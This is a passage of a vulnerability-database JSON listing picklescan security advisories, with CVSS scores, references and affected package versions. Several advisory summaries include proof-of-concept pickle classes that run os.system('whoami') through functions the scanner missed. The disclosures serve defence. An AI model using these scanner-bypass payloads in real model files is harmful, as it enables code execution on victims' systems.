"GHSA-vvpj-8cmc-gx39", "reference_type": "", "scores": [ { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-vvpj-8cmc-gx39" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/40119?format=api", "purl": "pkg:pypi/picklescan@1.0.4", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@1.0.4" } ], "aliases": [ "GHSA-vvpj-8cmc-gx39" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8q15-7ur4-kkde" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212460?format=api", "vulnerability_id": "VCID-a31m-q2ca-w7em", "summary": "Picklescan is vulnerable to RCE via missing detection when calling numpy.f2py.crackfortran.getlincoef", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/53", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/pull/53" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33" }, { "reference_url": "https://github.com/advisories/GHSA-rrxm-2pvv-m66x", "reference_id": "GHSA-rrxm-2pvv-m66x", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rrxm-2pvv-m66x" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-rrxm-2pvv-m66x", "reference_id": "GHSA-rrxm-2pvv-m66x", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-rrxm-2pvv-m66x" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/36380?format=api", "purl": "pkg:pypi/picklescan@0.0.33", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.33" } ], "aliases": [ "GHSA-rrxm-2pvv-m66x" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-a31m-q2ca-w7em" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360651?format=api", "vulnerability_id": "VCID-av36-fvk2-23be", "summary": "Picklescan missing detection when calling pytorch function torch.utils.bottleneck.__main__.run_cprofile\n### Summary\n\nUsing torch.utils.bottleneck.__main__.run_cprofile\n function, which is a pytorch library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to torch.utils.bottleneck.__main__.run_cprofile\n function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nimport torch.utils.bottleneck.__main__ as bottleneck_main\n\nclass EvilTorchUtilsBottleneckRunCprofile:\n def __reduce__(self):\n code = '__import__(\"os\").system(\"whoami\")'\n globs = {}\n return bottleneck_main.run_cprofile, (code, globs)\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/7f994d62084fe43f1cffdef2f9bae6923344ef53", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/7f994d62084fe43f1cffdef2f9bae6923344ef53" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/47", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/pull/47" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.28", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.28" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-4r9r-ch6f-vxmx", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-4r9r-ch6f-vxmx" }, { "reference_url": "https://github.com/advisories/GHSA-4r9r-ch6f-vxmx", "reference_id": "GHSA-4r9r-ch6f-vxmx", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4r9r-ch6f-vxmx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89080?format=api", "purl": "pkg:pypi/picklescan@0.0.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-357d-3wwy-aubk" }, { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-4nda-nuz6-gqgm" }, { "vulnerability": "VCID-555e-6p5m-xbbc" }, { "vulnerability": "VCID-6723-ghp7-yqd1" }, { "vulnerability": "VCID-6pqf-4qcr-ckac" }, { "vulnerability": "VCID-6smr-kf6r-53gc" }, { "vulnerability": "VCID-7dgj-c6cm-v3bt" }, { "vulnerability": "VCID-7jv5-uxzs-cucb" }, { "vulnerability": "VCID-83zm-7pnx-gkag" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-b4zf-mwfc-53bm" }, { "vulnerability": "VCID-b8nm-k5xu-yfc8" }, { "vulnerability": "VCID-bepy-gm8w-83e5" }, { "vulnerability": "VCID-brvs-drts-rbay" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-d1k5-6npz-2kcg" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fbng-xtyv-zqdf" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fsjg-pn1f-fqd6" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-hm3p-7t8t-bfb7" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-kne4-tcp8-m3c3" }, { "vulnerability": "VCID-n3yg-3gcp-nyc1" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-v5yc-uwn3-akbc" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" }, { "vulnerability": "VCID-zxc5-cgwk-qbcn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.28" } ], "aliases": [ "GHSA-4r9r-ch6f-vxmx" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-av36-fvk2-23be" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212596?format=api", "vulnerability_id": "VCID-ay9k-cbe6-wye5", "summary": "Picklescan (scan_pytorch) Bypass via dynamic eval MAGIC_NUMBER", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/b9997634683a4f4bd0c7e3701e7ce7e90fe70e8c", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/b9997634683a4f4bd0c7e3701e7ce7e90fe70e8c" }, { "reference_url": "https://github.com/advisories/GHSA-97f8-7cmv-76j2", "reference_id": "GHSA-97f8-7cmv-76j2", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-97f8-7cmv-76j2" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-97f8-7cmv-76j2", "reference_id": "GHSA-97f8-7cmv-76j2", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-97f8-7cmv-76j2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/39354?format=api", "purl": "pkg:pypi/picklescan@1.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@1.0.3" } ], "aliases": [ "GHSA-97f8-7cmv-76j2" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ay9k-cbe6-wye5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360631?format=api", "vulnerability_id": "VCID-b4zf-mwfc-53bm", "summary": "Picklescan has a missing detection when calling built-in python lib2to3.pgen2.grammar.Grammar.loads\n### Summary\n\nUsing lib2to3.pgen2.grammar.Grammar.loads, which is a built-in python library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to lib2to3.pgen2.grammar.Grammar.loads function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nclass Evil:\n def __reduce__(self):\n import os\n return (os.system, ('whoami',))\n\nclass EvilLib2to3Pgen2GrammarLoads:\n def __reduce__(self):\n from lib2to3.pgen2.grammar import Grammar\n payload = pickle.dumps(Evil())\n # payload = b'\\x80\\x04\\x95!\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x8c\\x05posix\\x94\\x8c\\x06system\\x94\\x93\\x94\\x8c\\x06whoami\\x94\\x85\\x94R\\x94.'\n return Grammar().loads, (payload,)\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/aecd11be98702caa9ba9b12189d91ad596a36114", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/aecd11be98702caa9ba9b12189d91ad596a36114" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-f54q-57x4-jg88", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-f54q-57x4-jg88" }, { "reference_url": "https://github.com/advisories/GHSA-f54q-57x4-jg88", "reference_id": "GHSA-f54q-57x4-jg88", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f54q-57x4-jg88" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89081?format=api", "purl": "pkg:pypi/picklescan@0.0.29", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.29" } ], "aliases": [ "GHSA-f54q-57x4-jg88" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-b4zf-mwfc-53bm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360673?format=api", "vulnerability_id": "VCID-b8nm-k5xu-yfc8", "summary": "Picklescan has a missing detection when calling built-in python profile.Profile.runctx\n### Summary\n\nUsing profile.Profile.runctx, which is a built-in python library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to profile.Profile.runctx function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nclass EvilProfileRunctx:\n def __reduce__(self):\n from profile import Profile\n payload = \"__import__('os').system('whoami')\"\n return Profile.runctx, (Profile(), payload, {}, {})\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/aecd11be98702caa9ba9b12189d91ad596a36114", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/aecd11be98702caa9ba9b12189d91ad596a36114" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-6vqj-c2q5-j97w", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-6vqj-c2q5-j97w" }, { "reference_url": "https://github.com/advisories/GHSA-6vqj-c2q5-j97w", "reference_id": "GHSA-6vqj-c2q5-j97w", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-6vqj-c2q5-j97w" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89081?format=api", "purl": "pkg:pypi/picklescan@0.0.29", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.29" } ], "aliases": [ "GHSA-6vqj-c2q5-j97w" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-b8nm-k5xu-yfc8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360710?format=api", "vulnerability_id": "VCID-be29-rx33-b7dp", "summary": "Duplicate Advisory: Picklescan Allows Remote Code Execution via Malicious Pickle File Bypassing Static Analysis\n## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-769v-p64c-89pr. This link is maintained to preserve external references.\n\n## Original Description\npicklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vulnerability scan. An attacker could craft a malicious model that uses Pickle include a malicious pickle file with a non-standard file extension. Because the malicious pickle file inclusion is not considered as part of the scope of picklescan, the file would pass security checks and appear to be safe, when it could instead prove to be problematic.", "references": [ { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1889", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1889" }, { "reference_url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1889", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1889" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-655q-fx9r-782v", "reference_id": "GHSA-655q-fx9r-782v", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-655q-fx9r-782v" }, { "reference_url": "https://github.com/advisories/GHSA-hw34-rqc5-h2gm", "reference_id": "GHSA-hw34-rqc5-h2gm", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-hw34-rqc5-h2gm" } ], "fixed_packages": [], "aliases": [ "GHSA-hw34-rqc5-h2gm" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-be29-rx33-b7dp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360666?format=api", "vulnerability_id": "VCID-bepy-gm8w-83e5", "summary": "Picklescan is missing detection when calling built-in python ensurepip._run_pip\n### Summary\n\nUsing ensurepip._run_pip function, which is a built-in python library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to ensurepip._run_pip function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nfrom ensurepip import _run_pip\n\nclass EvilEnsurepipRunpip:\n def __reduce__(self):\n payload = \"[(__import__('os').system('whoami'),)]\"\n return _run_pip, (payload,)\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/1931c2d04eaca8d20597705ff39cab78ba364e4b", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/1931c2d04eaca8d20597705ff39cab78ba364e4b" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-xp4f-hrf8-rxw7", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-xp4f-hrf8-rxw7" }, { "reference_url": "https://github.com/advisories/GHSA-xp4f-hrf8-rxw7", "reference_id": "GHSA-xp4f-hrf8-rxw7", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xp4f-hrf8-rxw7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89082?format=api", "purl": "pkg:pypi/picklescan@0.0.30", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": 